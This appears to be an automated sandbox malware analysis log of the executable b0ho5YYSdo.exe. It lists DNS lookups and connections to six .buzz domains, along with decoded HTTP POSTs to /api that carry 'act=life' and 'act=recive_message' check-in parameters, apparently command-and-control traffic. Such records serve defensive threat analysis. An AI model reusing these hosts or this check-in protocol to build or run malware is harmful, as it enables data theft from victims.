                                                                                                                Dec 26, 2024 12:50:04.247411013 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:04.247432947 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:05.565573931 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:05.565651894 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:05.567795038 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:05.567804098 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:05.568231106 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:05.569823980 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:05.569883108 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:05.569916964 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:11.933990002 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:12.258099079 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:12.258147955 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:12.258248091 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:12.258586884 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:12.258601904 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:13.569367886 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:13.569468975 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:13.571135044 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:13.571146011 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:13.571393013 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:13.572789907 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:13.572789907 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:13.572868109 CET44349825104.21.63.217192.168.2.9
                                                                                                                Dec 26, 2024 12:50:15.925975084 CET49825443192.168.2.9104.21.63.217
                                                                                                                Dec 26, 2024 12:50:16.286117077 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:16.286151886 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:16.286307096 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:16.287178040 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:16.287199020 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:17.599385023 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:17.599579096 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:17.601594925 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:17.601603031 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:17.601922035 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:17.606010914 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:17.606028080 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:17.606082916 CET44349836172.67.206.214192.168.2.9
                                                                                                                Dec 26, 2024 12:50:19.925714016 CET49836443192.168.2.9172.67.206.214
                                                                                                                Dec 26, 2024 12:50:20.263130903 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:20.263190985 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:20.263284922 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:20.264326096 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:20.264353037 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:21.575695038 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:21.575761080 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:21.577450037 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:21.577459097 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:21.577795029 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:21.578939915 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:21.578958035 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:21.579020023 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.506844997 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.506933928 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.507035971 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.509623051 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.509641886 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.509649992 CET49847443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.509655952 CET44349847104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.576451063 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.576493979 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:29.578816891 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.579130888 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:29.579154015 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:30.884180069 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:30.884301901 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:30.886929035 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:30.886944056 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:30.887192011 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:30.962668896 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:30.962690115 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:30.962764978 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975075006 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975231886 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975284100 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:45.975306034 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975444078 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975487947 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:45.975497007 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975595951 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975640059 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:45.975646973 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975749016 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.975795984 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:45.975801945 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.982701063 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:45.982758999 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:45.982768059 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.081635952 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.081650972 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.176043034 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.176106930 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.176129103 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.179972887 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.180036068 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.180054903 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.180191994 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.180239916 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.180358887 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.180376053 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.180391073 CET49868443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.180397034 CET44349868104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.524694920 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.524745941 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:46.524873972 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.525208950 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:46.525223970 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:47.836296082 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:47.836397886 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:47.838064909 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:47.838074923 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:47.838588953 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:47.871612072 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:47.871797085 CET44349904104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:47.872087002 CET49904443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:48.202095032 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:48.202172995 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:48.202577114 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:48.202960014 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:48.202975035 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.514374971 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.514458895 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:49.515754938 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:49.515774965 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.516613007 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.517771959 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:49.517823935 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.518037081 CET44349910104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:49.518080950 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:49.518109083 CET49910443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:50.004101992 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:50.004153013 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:50.004492044 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:50.004904032 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:50.004929066 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:51.307724953 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:51.307799101 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:51.312129974 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:51.312139988 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:51.312397003 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:51.315171957 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:51.315224886 CET44349913104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:51.315279007 CET49913443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:52.193064928 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:52.193104029 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:52.193201065 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:52.193450928 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:52.193465948 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:53.499368906 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:53.499491930 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:53.504631996 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:53.504648924 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:53.505057096 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:53.506536961 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:53.506597996 CET44349919104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:53.506684065 CET49919443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:54.683738947 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:54.683799028 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:54.683865070 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:54.684231997 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:54.684242964 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:55.997359991 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:55.997442007 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:55.998766899 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:55.998775959 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:55.999115944 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:56.000519037 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:56.000564098 CET44349923104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:56.000614882 CET49923443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:56.042093039 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:56.042160034 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:56.042464018 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:56.042571068 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:56.042581081 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:57.347219944 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:57.347354889 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:57.349714994 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:57.349726915 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:57.350035906 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:57.352194071 CET49929443192.168.2.9104.21.66.113
                                                                                                                Dec 26, 2024 12:50:57.352251053 CET44349929104.21.66.113192.168.2.9
                                                                                                                Dec 26, 2024 12:50:57.352320910 CET49929443192.168.2.9104.21.66.113
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 26, 2024 12:49:19.957967997 CET5082153192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:49:20.095398903 CET53508211.1.1.1192.168.2.9
                                                                                                                Dec 26, 2024 12:49:51.940876961 CET6106253192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:49:52.335903883 CET53610621.1.1.1192.168.2.9
                                                                                                                Dec 26, 2024 12:50:03.927000999 CET5670653192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:50:04.245834112 CET53567061.1.1.1192.168.2.9
                                                                                                                Dec 26, 2024 12:50:11.935714960 CET5713653192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:50:12.257117033 CET53571361.1.1.1192.168.2.9
                                                                                                                Dec 26, 2024 12:50:15.931960106 CET5081053192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:50:16.239653111 CET53508101.1.1.1192.168.2.9
                                                                                                                Dec 26, 2024 12:50:19.944587946 CET5145053192.168.2.91.1.1.1
                                                                                                                Dec 26, 2024 12:50:20.261877060 CET53514501.1.1.1192.168.2.9
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 26, 2024 12:49:19.957967997 CET192.168.2.91.1.1.10x6e66Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:51.940876961 CET192.168.2.91.1.1.10x6bStandard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:03.927000999 CET192.168.2.91.1.1.10xc81eStandard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:11.935714960 CET192.168.2.91.1.1.10xc800Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:15.931960106 CET192.168.2.91.1.1.10xbfd8Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:19.944587946 CET192.168.2.91.1.1.10x48c3Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 26, 2024 12:49:14.677516937 CET1.1.1.1192.168.2.90xf858No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:14.677516937 CET1.1.1.1192.168.2.90xf858No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:20.095398903 CET1.1.1.1192.168.2.90x6e66No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:20.095398903 CET1.1.1.1192.168.2.90x6e66No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:52.335903883 CET1.1.1.1192.168.2.90x6bNo error (0)prisonyfork.buzz104.21.74.40A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:49:52.335903883 CET1.1.1.1192.168.2.90x6bNo error (0)prisonyfork.buzz172.67.197.192A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:04.245834112 CET1.1.1.1192.168.2.90xc81eNo error (0)rebuildeso.buzz172.67.143.157A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:04.245834112 CET1.1.1.1192.168.2.90xc81eNo error (0)rebuildeso.buzz104.21.49.94A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:12.257117033 CET1.1.1.1192.168.2.90xc800No error (0)scentniej.buzz104.21.63.217A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:12.257117033 CET1.1.1.1192.168.2.90xc800No error (0)scentniej.buzz172.67.172.12A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:16.239653111 CET1.1.1.1192.168.2.90xbfd8No error (0)inherineau.buzz172.67.206.214A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:16.239653111 CET1.1.1.1192.168.2.90xbfd8No error (0)inherineau.buzz104.21.44.253A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:20.261877060 CET1.1.1.1192.168.2.90x48c3No error (0)screwamusresz.buzz104.21.66.113A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 12:50:20.261877060 CET1.1.1.1192.168.2.90x48c3No error (0)screwamusresz.buzz172.67.159.117A (IP address)IN (0x0001)false
                                                                                                                • mindhandru.buzz
                                                                                                                • prisonyfork.buzz
                                                                                                                • rebuildeso.buzz
                                                                                                                • scentniej.buzz
                                                                                                                • inherineau.buzz
                                                                                                                • screwamusresz.buzz
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949712104.21.11.1014437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:49:21 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-26 11:49:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949783104.21.74.404437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:49:53 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: prisonyfork.buzz
                                                                                                                2024-12-26 11:49:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.949808172.67.143.1574437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:50:05 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: rebuildeso.buzz
                                                                                                                2024-12-26 11:50:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.949825104.21.63.2174437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:50:13 UTC261OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: scentniej.buzz
                                                                                                                2024-12-26 11:50:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.949836172.67.206.2144437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:50:17 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: inherineau.buzz
                                                                                                                2024-12-26 11:50:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.949847104.21.66.1134437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:50:21 UTC265OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: screwamusresz.buzz
                                                                                                                2024-12-26 11:50:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-26 11:50:29 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 26 Dec 2024 11:50:29 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=nnu5o948lfq03q3utkkmlq6d06; expires=Mon, 21 Apr 2025 05:37:08 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lyPd0ADYIVC4KrM8lHvVJH3NIGHiklTzOcUAQsMUgkDHV75olvjyeAtETTkYm66jqZEnsUkMHhIaxY%2BDXAgJJ5SzTS2CbiO18hhZheFLdVVKLpiOk0STx9tz1F9WlTWDACTXzw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f80da529f63f799-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1453&rtt_var=556&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1950567&cwnd=92&unsent_bytes=0&cid=d8eab7572d74611a&ts=7944&x=0"
                                                                                                                2024-12-26 11:50:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-26 11:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.949868104.21.66.1134437412C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-26 11:50:30 UTC266OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: screwamusresz.buzz
                                                                                                                2024-12-26 11:50:30 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                2024-12-26 11:50:45 UTC1127INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 26 Dec 2024 11:50:45 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
